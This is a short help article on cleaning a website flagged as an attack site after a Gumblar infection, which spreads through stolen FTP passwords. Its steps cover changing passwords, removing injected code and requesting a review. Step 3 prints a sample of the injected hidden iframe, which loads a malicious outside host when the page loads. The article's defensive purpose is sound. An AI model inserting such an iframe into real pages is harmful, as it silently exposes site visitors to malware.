Clean Reported Attack Site!

This attack alert is displayed in many browsers in your site is infected with hidden iframe or javascript virus.

Its also known as Gumblar / Gumbler attack. This is generally caused when the machine you / your developer are using to upload the files is infected and passwords are saved in cuteftp or any other ftp client.

When ever html / php files are uploaded through ftp, the virus inserts a hidden iframe or javascript which has a link to some banned sites. Due to this browsers block your site at it has links to dangerous / blocked sites.

Follow the steps in sequence to get the alert removed from your site.

  1. Remove all saved passwords on your infected computer and don’t save them until you get your entire system scanned and virus are removed.
  2. Change your ftp passwords
  3. Remove the hidden iframe tags from all the files
    sample of infected hidden iframe tags :-
    <iframe frameborder="0" onload="if (!this.src){ this.height='0'
    ; this.src='http://supernil.ru:8080/index.php'; this.width='0';}">
    1258180561co3 </iframe>
  4. Remove any obfuscated / jumbled javascript from your webpages.
  5. Upload all cleaned files.
  6. Submit your site for review at :- http://www.stopbadware.org/home/reportsearch
  7. They will review your site and remove the site once they are sure that there is no infected code in your webpage.